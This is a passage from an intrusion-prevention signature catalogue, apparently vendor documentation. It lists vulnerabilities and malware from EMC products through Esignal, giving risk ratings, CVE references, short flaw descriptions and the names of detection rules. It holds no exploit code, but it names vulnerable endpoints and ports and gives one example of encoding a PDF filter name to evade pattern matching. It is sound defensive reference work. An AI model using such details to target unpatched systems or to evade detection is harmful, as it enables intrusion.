A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the UnifiedFileUploadMoreInfoServlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can copy any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CSU-EMC-Cmcne-Inmservlets.war-Unifiedfileuploadmoreinfoservlet-Directory-Traversal

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

OSVDB-101209
http://www.osvdb.org/101209

EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

A code execution vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadController servlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CS-EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

EMC-Cmcne-Inmservlets.war-Softwarefileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the SoftwareFileUploadMoreInfoServlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can move any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CSU-EMC-Cmcne-Inmservlets-Softwarefileuploadmoreinfoservlet-Directory-Traversal

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

OSVDB-101211
http://www.osvdb.org/101211

EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service

About this vulnerability:

A vulnerability in EMC Retrospect Client

Risk:

Moderate

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Retrospect Client

Type:

Malfunction

Description:

A Denial of Service (DoS) vulnerability exists in the EMC Retrospect Backup agent. This vulnerability is a result of improper handling of specially crafted packets. An unauthenticated remote attacker can exploit this vulnerability to cause the application to terminate, preventing the backups from occurring on that system. Upon processing the crafted message, the Retrospect Backup client agent process terminates. A Retrospect Backup server can no longer connect to the target and perform backup operations. The affected service must be restarted to resume functionality.

Situation:

Generic_CS-EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service

References:

CVE-2006-0995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0995

BID-16933
http://www.securityfocus.com/bid/16933

EMC-Data-Protection-Advisor-Denial-Of-Service

About this vulnerability:

A vulnerability in EMC Data Protection Advisor

Risk:

Moderate

First detected in:

sgpkg-ips-448-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Data Protection Advisor

Type:

Malfunction

Description:

There is a denial of service vulnerability in EMC Data Protection Advisor. The vulnerability is due to a NULL pointer dereference when handling a non-existent password field in a AUTHENTICATECONNECTION message. A remote attacker can exploit this vulnerability by sending specially crafted requests to the vulnerable service. Successful exploitation could result in a denial of service condition.

Situation:

Generic_CS-EMC-Data-Protection-Advisor-Denial-Of-Service

References:

OSVDB-80814
http://www.osvdb.org/80814

EMC-Data-Protection-Advisor-Static-Credentials-Authentication-Bypass

About this vulnerability:

A vulnerability in EMC Data Protection Advisor

Risk:

Moderate

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Data Protection Advisor

Type:

Malfunction

Description:

Hard-coded credentials can be used to authenticate to EMC Data Protection Advisor with administrative privileges.

Situation:

HTTP_CS-EMC-Data-Protection-Advisor-Application-Service-Static-Credentials-Authentication-Bypass

References:

CVE-2017-8013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8013

EMC-NetWorker-Librpc.dll-Security-Check-Bypass

About this vulnerability:

A vulnerability in EMC Legato NetWorker

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Malfunction

Description:

A security bypass vulnerability exists in EMC Legato Networker. The vulnerability exists in the portmapper component librpc.dll and is due to insufficient access control when handling portmap requests. Remote unauthenticated attackers can exploit the vulnerability by spoofing a source address as localhost or 127.0.0.1 to register Remote Procedure Call (RPC) services which allows them to eavesdrop on communications. It is also possible for the attackers to cause a Denial of Service condition on the server.

Situation:

Shared-UDP_SunRPC-EMC-NetWorker-Librpc.dll-Security-Check-Bypass

References:

CVE-2011-0321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0321

BID-46044
http://www.securityfocus.com/bid/46044

OSVDB-70686
http://www.osvdb.org/70686

EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution

About this vulnerability:

A vulnerability in EMC NetWorker

Risk:

Moderate

First detected in:

sgpkg-ips-478-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Format String

Description:

A format string vulnerability has been reported in EMC NetWorker. The vulnerability is due to insufficient validation of input to the SunRPC service. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the nsrd SunRPC service. This can result in code execution in the context of the affected service.

Situation:

SunRPC_TCP-EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution

References:

CVE-2012-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2288

BID-55330
http://www.securityfocus.com/bid/55330

OSVDB-85116
http://www.osvdb.org/85116

EMC-NetWorker-Nsrd-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC NetWorker

Risk:

Moderate

First detected in:

sgpkg-ips-477-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in EMC NetWorker. The vulnerability is due to insufficient validation of input to the SunRPC service exposed by the nsrd process. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the nsrd SunRPC service. This can result in code execution in the context of the affected service.

Situation:

SunRPC_TCP-EMC-NetWorker-Nsrd-Stack-Buffer-Overflow

References:

CVE-2012-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2288

BID-55330
http://www.securityfocus.com/bid/55330

OSVDB-85116
http://www.osvdb.org/85116

EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC NetWorker

Risk:

Moderate

First detected in:

sgpkg-ips-506-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in EMC NetWorker, an enterprise level data protection software system. There is an unspecified error in nsrindexd, a service that exposes an RPC interface, that leads to a buffer overflow vulnerability. An attacker can exploit this vulnerability to cause a denial of service or execute arbitrary code in the context of the affected application.

Situation:

SunRPC_CS-EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow

References:

CVE-2012-4607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4607

OSVDB-89054
http://www.osvdb.org/89054

EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC NetWorker

Risk:

Moderate

First detected in:

sgpkg-ips-442-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in EMC NetWorker. The flaw is due to improper boundary check when processing RPC requests in the nsrindexd.exe. A remote unauthenticated attacker can leverage this vulnerability by sending crafted RPC message to the target host, potentially inject and execute arbitrary code with System level privileges. In a simple attack case, the affected service process will terminate abnormally when the malicious message is processed. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code.

Situation:

SunRPC_CS-EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow

References:

CVE-2012-0395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0395

OSVDB-78553
http://www.osvdb.org/78553

EMC-Replication-Manager-Command-Execution

About this vulnerability:

An EMC Replication Manager Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Replication Manager

Type:

Input Validation

Description:

A vulnerability in EMC Replication Manager, versions 2.1 and 2.2, in the irccd.exe service, which allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542.

Situation:

Generic_CS-EMC-Replication-Manager-Command-Execution

References:

CVE-2011-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0647

BID-46235
http://www.securityfocus.com/bid/46235

OSVDB-70853
http://www.osvdb.org/70853

EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service

About this vulnerability:

A vulnerability in EMC RepliStor

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC RepliStor

Type:

Input Validation

Description:

A denial of service vulnerability exists in EMC RepliStor. The vulnerability is due to an input validation error while parsing a specially crafted packet sent to 'rep_srv.exe' and 'ctrlservice.exe' services. Remote unauthenticated attackers can exploit this vulnerability by sending a malicious packet to the services on ports 7144/TCP and 7145/TCP. Successful exploitation of this vulnerability would abnormally terminate the targeted service and cause a denial of service condition.

Situation:

Generic_CS-EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service

References:

CVE-2009-3744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3744

BID-36738
http://www.securityfocus.com/bid/36738

EMC-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal

About this vulnerability:

A vulnerability in EMC VMAX3 VASA Provider

Risk:

Moderate

First detected in:

sgpkg-ips-986-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMAX3 VASA Provider

Type:

Directory Traversal

Description:

Invalid validation of the filename parameter causes a directory traversal vulnerability in the Uploadconfigurator functionality in EMC VMAX3 VASA Provider. A successful exploit may allow an attacker to execute arbitrary code on the target server with root privileges.

Situation:

HTTP_CS-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal

References:

CVE-2017-4997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4997

EMF-Windows-Graphics-Rendering-Engine-BOF

About this vulnerability:

Buffer overflow in Windows Graphics Rendering Engines emf/wmf parsing

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Graphics Rendering Engine

Type:

Buffer Overflow

Description:

Windows Graphics Rendering Engine suffers from a buffer overflow vulnerability in the parsing of EMF/WMF metafiles. By tricking a victim into viewing a malicious emf/wmf-image with an application that uses the vulnerable functions, including Internet Explorer, or browsing a folder where the file exists with image thumbnails turned on, the vulnerability can be exploited to execute arbitrary code.

Situation:

HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF
HTTP_EMF-Windows-Graphics-Rendering-Engine-BOF-2
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF
File-Binary_EMF-Windows-Graphics-Rendering-Engine-BOF-2

References:

CVE-2004-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0209

BID-11375
http://www.securityfocus.com/bid/11375

MS04-032
http://technet.microsoft.com/security/bulletin/MS04-032

Emotet-Banking-Malware

About this vulnerability:	Activity related to Emotet malware
Risk:	High
First detected in:	sgpkg-ips-894-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Emotet is a trojan mainly used to target financial service providers.
Situation:	HTTP_CHS-Emotet-Host-In-HTTP

Emotet-Download-Page

About this vulnerability:	Emotet download page was detected
Risk:	High
First detected in:	sgpkg-ips-1411-5242
Last changed:	sgpkg-ips-1411-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Emotet download page was detected.
Situation:	File-Text_Emotet-Download-Page

Emotet-Malware-Infection-Traffic

About this vulnerability:	Emotet malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1268-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Emotet malware infection traffic was detected.
Situation:	HTTP_CS-Emotet-Malware-Infection-Traffic

Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability

About this vulnerability:

Enalean Tuleap Remote PHP Code Injection Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Enalean Tuleap

Type:

PHP Injection

Description:

A underialize() function vulnerability in Enalean Tuleap, versions before 7.7, which allows remote attackers to execute arbitrary PHP code due to the lack of user input sanitization.

Situation:

HTTP_CRL-Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability

References:

CVE-2014-8791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8791

BID-71335
http://www.securityfocus.com/bid/71335

Encoded-Crlf-Sequence

About this vulnerability:	A percent-encoded CRLF sequence in URI
Risk:	Moderate
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Metacharacter Injection
Description:	Percent-encoded CRLF sequence in URI may indicate a header injection attack against vulnerable web servers.
Situation:	HTTP_CSU-Encoded-Crlf-Sequence

Encoded-JavaScript-Tag-In-PDF

About this vulnerability:	Encoded JavaScript tag in PDF detected
Risk:	Moderate
First detected in:	sgpkg-ips-401-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	An encoded JavaScript tag was found in a PDF file. This may be an attempt to circumvent pattern matching done by security devices.
Situation:	HTTP_SS-Encoded-JavaScript-In-PDF File-PDF_Encoded-JavaScript-Tag-In-PDF

Encoded-Stream-Filter-Name-In-PDF

About this vulnerability:	Encoded stream filter name in PDF detected
Risk:	Moderate
First detected in:	sgpkg-ips-443-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	An encoded stream filter name (such as "/F#6c#61#74#65#44#65#63#6f#64e" instead of "/FlateDecode") was found in a PDF file. This may be an attempt to circumvent pattern matching done by security devices.
Situation:	File-PDF_Encoded-Stream-Filter-Name-In-PDF

Encrypted_Server_Name_Indicator

About this vulnerability:	Encrypted Server Name Indicator usage detected
Risk:	Low
First detected in:	sgpkg-ips-1237-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Encrypted Server Name Indicator (ESNI) is an extension to the TLS 1.3 protocol that prevents intercepting the TLS Server Name Indicator (SNI) extension. The SNI extension can be used to determine which websites users are visiting.
Situation:	TLS_CS-Encrypted_Server_Name_Indicator

Endian-Firewall-Proxy-Password-Change-Command-Execution

About this vulnerability:

A vulnerability in Endian Firewall

Risk:

Moderate

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Endian Firewall

Type:

Malfunction

Description:

A command injection vulnerability has been reported in Endian Firewall. The vulnerability is due to an input validation error of the NEW_PASSWORD_1 parameter in the chpasswd.cgi script. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target. Successful exploitation could lead to remote command execution under the security context of the Apache HTTP server process.

Situation:

HTTP_CRL-Endian-Firewall-Proxy-Password-Change-Command-Execution
File-Binary_Endian-Firewall-Proxy-Password-Change-Command-Execution

References:

CVE-2015-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082

Energizer-Duo-USB-Charger-Backdoor-Access

About this vulnerability:

A backdoor in Energizer Duo USB Charger software

Risk:

High

First detected in:

sgpkg-ips-293-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Energizer Duo USB Charger

Type:

Remote Control

Description:

There is a backdoor in the Energizer Duo USB Charger software. This trojan horse software allows complete control of the victim system, including arbitrary code execution.

Situation:

Generic_CS-Energizer-Duo-USB-Charger-Backdoor-Access

References:

CVE-2010-0103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0103

BID-38571
http://www.securityfocus.com/bid/38571

Enfal-Malware

About this vulnerability:	Enfal malware
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Enfal is Windows malware.
Situation:	HTTP_CSU-Enfal-Traffic

Enigma2-Webinterface-Remote-Root-File-Disclosure

About this vulnerability:

A vulnerability in Enigma2 Webinterface

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Enigma2 Webinterface

Type:

Malfunction

Description:

There is a directory traversal vulnerability in Enigma2 Webinterface which allows remote attackers to read arbitrary files.

Situation:

HTTP_CRL-Enigma2-Webinterface-Remote-Root-File-Disclosure

References:

CVE-2012-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1024

OSVDB-78999
http://www.osvdb.org/78999

EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in EnjoySAP

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EnjoySAP

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in EnjoySAP, a graphical user interface for SAP. The vulnerability is due to lack of input validation while processing user-supplied parameters for kwedit ActiveX control.

Situation:

HTTP_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow
File-Text_EnjoySAP-kwedit-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-3605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3605

BID-24772
http://www.securityfocus.com/bid/24772

OSVDB-37690
http://www.osvdb.org/37690

EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in EnjoySAP

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EnjoySAP

Type:

Malfunction

Description:

Situation:

HTTP_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow
File-Text_EnjoySAP-rfcguisink-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-3606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3606

BID-24777
http://www.securityfocus.com/bid/24777

OSVDB-37689
http://www.osvdb.org/37689

Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Enterasys Network Management Suite detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Enterasys

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in the Syslog service of Enterasys Network Management Suite, before 4.1.0.80, which allows remote attackers to execute arbitrary code via a long PRIO message field.

Situation:

Generic_UDP-Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow

References:

CVE-2011-5227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5227

BID-51124
http://www.securityfocus.com/bid/51124

OSVDB-77971
http://www.osvdb.org/77971

EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass

About this vulnerability:	A vulnerability in EnterpriseDB Postgres Plus Advanced Server
Risk:	High
First detected in:	sgpkg-ips-384-4219
Last changed:	sgpkg-ips-1732-5242
Platform:	Generic
Software:	EnterpriseDB Postgres Plus Advanced Server
Type:	Malfunction
Description:	An authentication bypass vulnerability exists in the DBA Management Server component of EnterpriseDB Postgres Plus Advanced Server.
Situation:	HTTP_CSU-EnterpriseDB-Postgres-Plus-Advanced-Server-Authentication-Bypass

Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in EnterpriseDT CompleteFTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1570-5242

Last changed:

sgpkg-ips-1570-5242

Platform:

Generic

Software:

EnterpriseDT CompleteFTP Server

Type:

Input Validation

Description:

An arbitrary file deletion vulnerability has been reported in EnterpriseDT CompleteFTP Server. The vulnerability is due to a flaw in HttpFile class. An unauthenticated remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation would allow an attacker to delete arbitrary files with SYSTEM privileges.

Situation:

HTTP_CS-Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion

References:

CVE-2022-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2560

Envoy-HTTP-Url-Path-Access-Control-Bypass

About this vulnerability:

A vulnerability in Envoy Envoy

Risk:

Moderate

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Generic

Software:

Envoy

Type:

Input Validation

Description:

There exists an access control bypass vulnerability in Envoy. Successful exploitation could lead in the bypassing of access control filters for restricted paths.

Situation:

HTTP_CSU-Envoy-HTTP-Url-Path-Access-Control-Bypass

References:

CVE-2021-29492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29492

EQGRP-Tools

About this vulnerability:	Tools associated with the Equation Group (EQGRP)
Risk:	High
First detected in:	sgpkg-ips-880-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	The Equation Group is a threat actor which was originaly discovered in 2015. The tools associated with the EQGRP have been since publicly disclosed by a hacking group calling itself "The Shadow Brokers".
Situation:	File-Binary_EQGRP-noclient File-Binary_EQGRP-Durablenapkin.Solaris.2.0.1.1 File-Text_EQGRP-installdate.pl File-Exe_EQGRP-teflondoor.exe File-Exe_EQGRP-teflonhandle.exe File-Exe_EQGRP-EternalBlue-2.2.0.exe File-Exe_EQGRP-Eternalchampion File-Exe_EQGRP-Eternalsynergy File-Exe_EQGRP-Eternalromance

Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255

About this vulnerability:

A vulnerability in Eramba

Risk:

Moderate

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Unix;Linux

Software:

Eramba

Type:

Input Validation

Description:

A vulnerability in Eramba, versions before 3.19.1, which allows remote attackers to execute arbitrary commands on the target system via the path parameter in a request to /settings/download-test-pdf.

Situation:

HTTP_CSU-Eramba-Authenticated-Remote-Code-Execution-Module-CVE-2023-36255

References:

CVE-2023-36255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36255

Ericom-AccessNow-Server-Buffer-Overflow

About this vulnerability:

Ericom AccessNow Server insecure usage of vsprintf

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3;Windows 2003 SP2

Software:

Ericom AccessNow

Type:

Buffer Overflow

Description:

A vulnerability in Ericom AccessNow Server consisting of an insecure usage of vsprintf which allows a remote attacker to perform a buffer overflow with a malformed HTTP request.

Situation:

HTTP_CSU-Ericom-AccessNow-Server-Buffer-Overflow

References:

CVE-2014-3913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3913

BID-67777
http://www.securityfocus.com/bid/67777

OSVDB-107674
http://www.osvdb.org/107674

Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433

About this vulnerability:

A vulnerability in the Erlang/OTP SSH library

Risk:

Critical

First detected in:

sgpkg-ips-1869-5242

Last changed:

sgpkg-ips-1869-5242

Platform:

Generic

Software:

Erlang OTP

Type:

Malfunction

Description:

A flaw in the SSH protocol message handling allows unauthenticated remote code execution in Erlang/OTP SSH library versions before OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

Situation:

SSH_Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433

References:

CVE-2025-32433
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433

Es-File-Explorer-Open-Port

About this vulnerability:

A vulnerability in ES File Explorer

Risk:

High

First detected in:

sgpkg-ips-1197-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ES File Explorer

Type:

Insecure Configuration

Description:

A vulnerability in ES File Explorer, version 4.1.9.5.1, which allows remote attackers to read arbitrary files and execute applications via TCP port 59777. After using the ES application once the port will remain open and vulnerable.

Situation:

HTTP_CRL-Es-File-Explorer-Open-Port

References:

CVE-2019-6447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447

Esbot-Botnet

About this vulnerability:	Esbot botnet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Espot is an IRC-controlled botnet.
Situation:	Generic_CS-Botnet-Esbot-Activity

Esf-Pfsense-Cross-Site-Scripting

About this vulnerability:	An Esf Pfsense Cross Site Scripting vulnerability
Risk:	High
First detected in:	sgpkg-ips-774-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PfSense
Type:	Input Validation
Description:	A vulnerbility in ESF PfSense, version 2.3.1-RELEASE-p1, which allows remote attackers to execute arbitrary commands in the url, source, user, or virus parameters to squid_clwarn.php.
Situation:	HTTP_CSU-Esf-Pfsense-Cross-Site-Scripting

Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability:

Multiple vulnerabilities in Electric Sheep Fencing pfSense

Risk:

Moderate

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

Multiple cross-site scripting vulnerabilities have been reported in Electric Sheep Fencing pfSense firewall. The vulnerabilites are due to insufficient validation. By convincing a user to visit a malicious website, a remote attacker can exploit the XSS vulnerabilities to execute arbitrary scripts in the user's browser session or gain access to sensitive information.

Situation:

HTTP_CRL-Esf-Pfsense-Status_captiveportal-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Firewall_Shaper-Cross-Site-Scripting
HTTP_CRL-Esf-Pfsense-Diag_Logs_Filter-Multiple-Cross-Site-Scripting-Vulnerabilities
HTTP_CRL-Esf-Pfsense-Services_unbound_acls-Cross-Site-Scripting

References:

CVE-2015-2294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2294

Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure

About this vulnerability:

A vulnerability in Electric Sheep Fencing pfSense Snort

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

An information disclosure vulnerability exists in the pfSense Snort service. The vulnerability is due to insufficient validation of user-supplied input. A remote, authenticated attacker could use this vulnerability to retrieve valuable information from the server. Successful exploitation could lead to information disclosure in the security context of the root user.

Situation:

HTTP_CSU-Esf-Pfsense-Snort-Snort_log_view.php-Information-Disclosure

References:

BID-65181
http://www.securityfocus.com/bid/65181

OSVDB-102608
http://www.osvdb.org/102608

Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection

About this vulnerability:	A vulnerability in Electric Sheep Fencing pfSense
Risk:	Moderate
First detected in:	sgpkg-ips-760-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PfSense
Type:	Input Validation
Description:	Improper parsing of requests to the traffic graph component of pfSense results in a command injection vulnerability, which allows an attacker to gain root-level code execution privileges on the target.
Situation:	HTTP_CRL-Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection File-Text_Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection

Esf-Pfsense-Webgui-Deletefile-Directory-Traversal

About this vulnerability:

A vulnerability in Electric Sheep Fencing pfSense

Risk:

High

First detected in:

sgpkg-ips-644-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Electric Sheep Fencing pfSense firewall. This vulnerability is due to insufficient validation of the deletefile HTTP request parameter in "/system_firmware_restorefullbackup.php". By convincing an authenticated user to click on a crafted link, a remote attacker can exploit this vulnerability to delete arbitrary files on the target system with root privileges.

Situation:

HTTP_CRL-Esf-Pfsense-Webgui-Deletefile-Directory-Traversal

References:

CVE-2015-2295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2295

OSVDB-119219
http://www.osvdb.org/119219

Esignal-Buffer-Overflow

About this vulnerability:

A vulnerability in Interactive Data eSignal

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Interactive Data eSignal

Type:

Buffer Overflow

Description:

